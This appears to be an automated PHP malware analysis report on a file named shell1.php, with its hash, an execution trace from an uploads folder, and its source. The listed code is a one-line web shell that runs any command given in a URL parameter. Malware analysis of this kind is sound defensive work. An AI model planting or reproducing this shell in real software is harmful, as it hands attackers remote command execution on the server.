PHP Malware Analysis

shell1.php

md5: 42eb2a289562d50ecb1b8b31b6b6c3b7

Jump to:

Screenshot


Attributes

Execution

Input


Deobfuscated PHP code

<?php

echo system($_GET['cmd']);

Execution traces

data/traces/42eb2a289562d50ecb1b8b31b6b6c3b7_trace-1676249383.6417.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:50:09.539497]
1	0	1	0.000147	393528
1	3	0	0.000186	393112	{main}	1		/var/www/html/uploads/shell1.php	0	0
1	3	1	0.000202	393112
			0.000226	314240
TRACE END   [2023-02-12 22:50:09.539606]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?echo system($_GET['cmd']);?>